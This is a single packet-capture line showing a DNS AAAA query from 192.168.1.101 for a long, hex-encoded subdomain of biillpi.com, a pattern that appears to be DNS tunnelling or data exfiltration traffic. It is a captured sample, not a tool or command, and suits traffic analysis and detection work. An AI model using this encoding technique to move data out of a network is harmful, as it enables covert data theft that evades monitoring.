21   9.610991 192.168.1.101 → 192.168.1.1  DNS 314 Standard query 0x8b73 AAAA 898A926AB2D9AFF7CD2FFB3BE8A8A0545BB9BA96D8D7DAD1D6CBE6D5D0D7CCC.196CBDCD4D7CCC1E6F58D888C89888888978F8EFBFF8F81FD80FDFD89FF8DFD.8E8B808B898DFF88FB8EFB8D8AF8F8F888FF968996F58D888C8988888896888.989889688898E97888C8197888C97888896FF81.biillpi.com OPT